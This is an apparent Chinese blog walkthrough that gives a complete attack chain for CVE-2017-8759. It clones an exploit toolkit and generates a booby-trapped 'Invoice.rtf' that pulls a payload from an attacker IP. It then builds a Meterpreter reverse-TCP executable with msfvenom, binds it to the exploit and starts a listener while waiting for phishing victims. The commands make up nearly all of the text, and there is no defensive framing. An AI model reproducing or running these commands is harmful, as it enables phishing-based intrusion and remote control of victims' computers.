kali下载python脚本,生成rtf文件:
下载脚本:git clone https://github.com/bhdresh/CVE-2017-8759.git
生成rtf文件:
python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.8.131/logo.txt
![0](https://i-blog.csdnimg.cn/blog_migrate/3f4ee4c22978cd4e65bc5b3265d84ca6.png)
利用msfvenom生成木马
生成exe:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1133 -f exe > /root/shell.exe
![0](https://i-blog.csdnimg.cn/blog_migrate/15f6aed46ab6f2f4c0e2fe1c836647b6.png)
捆绑木马:
python cve-2017-8759_toolkit.py -M exp -e http://192.168.8.124/shell.exe -l /root/shell.exe
![0](https://i-blog.csdnimg.cn/blog_migrate/70a593e2d0520757adb9e18f0a93b986.png)
启动监听,等待钓鱼上线
![0](https://i-blog.csdnimg.cn/blog_migrate/3115ff435ecd264cb4b67e920e36d6fe.png)
![0](https://ynote-resource-dl.lx.netease.com/ydl/resource?key=qqAA5DBC6CDEC7D7A0289B3E0A4AAEDC1C%2F5E6A232D60104D7EB5E04AC601C766AC&mime=image%2Fpng&name=clipboard.png&reqId=6126d5a8-92a0-458b-8317-afb6205a04ba&ts=1615973131507&type=NOS&sign=404a374a3d0019eac3767e973a716d2f)